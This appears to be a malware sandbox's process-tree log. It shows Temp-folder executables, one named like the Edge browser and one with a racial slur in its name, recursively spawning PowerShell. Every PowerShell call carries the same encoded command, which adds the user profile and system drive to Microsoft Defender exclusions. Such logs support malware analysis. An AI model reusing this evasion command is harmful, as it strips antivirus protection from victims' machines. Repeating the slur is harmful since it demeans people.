C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="37⤵PID:6944
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"37⤵PID:3832
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"37⤵PID:6940
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="38⤵PID:6624
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"38⤵PID:5828
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"38⤵PID:6576
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="39⤵PID:4688
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"39⤵PID:6716
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"39⤵PID:1668
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="40⤵PID:4524
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"40⤵PID:1152
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"40⤵PID:4408
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="41⤵PID:6568
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"41⤵PID:6908
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"41⤵PID:1172
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="42⤵PID:6848
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"42⤵PID:5604
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"42⤵PID:7080
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="43⤵PID:7052
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"43⤵PID:4964
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"43⤵PID:4596
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="44⤵PID:4264
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"44⤵PID:6540
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"44⤵PID:1980
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="45⤵PID:880
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"45⤵PID:6160
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"45⤵PID:5520
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="46⤵PID:3368
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"46⤵PID:4344
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"46⤵PID:1720
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="47⤵PID:916
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"47⤵PID:1212
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"47⤵PID:4056
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="48⤵PID:2264
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"48⤵PID:4748
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"48⤵PID:5692
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="49⤵PID:1640
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"49⤵PID:2164
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"49⤵PID:1980
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="50⤵PID:5340
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"50⤵PID:5664
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"50⤵PID:2912
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="51⤵PID:2272
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"51⤵PID:2324
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"51⤵PID:1668
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="52⤵PID:6228
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"52⤵PID:3232
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"52⤵PID:3876
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="53⤵PID:3772
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"53⤵PID:6540
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"53⤵PID:4904
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="54⤵PID:5904
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"54⤵PID:5952
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"54⤵PID:5984
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="55⤵PID:5548
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"55⤵PID:6176
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"55⤵PID:5460
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="56⤵PID:5696
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"56⤵PID:5008
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"56⤵PID:4444
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="57⤵PID:5532
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"57⤵PID:5964
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"57⤵PID:6596
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="58⤵PID:7116
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"58⤵PID:6264
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"58⤵PID:6388
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="59⤵PID:5456
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"59⤵PID:4992
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"59⤵PID:5412
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="60⤵PID:8
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"60⤵PID:6344
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"60⤵PID:6328
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="61⤵PID:6588
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"61⤵PID:4444
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"61⤵PID:3624
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="62⤵PID:6448
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV163⤵PID:1196
-
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"62⤵PID:2164
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"62⤵PID:7024
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="63⤵PID:6472
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"63⤵PID:7148
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"63⤵PID:7132
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="64⤵PID:6392
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"64⤵PID:6288
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"64⤵PID:960
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="65⤵PID:3044
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"65⤵PID:6168
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"65⤵PID:6904
-
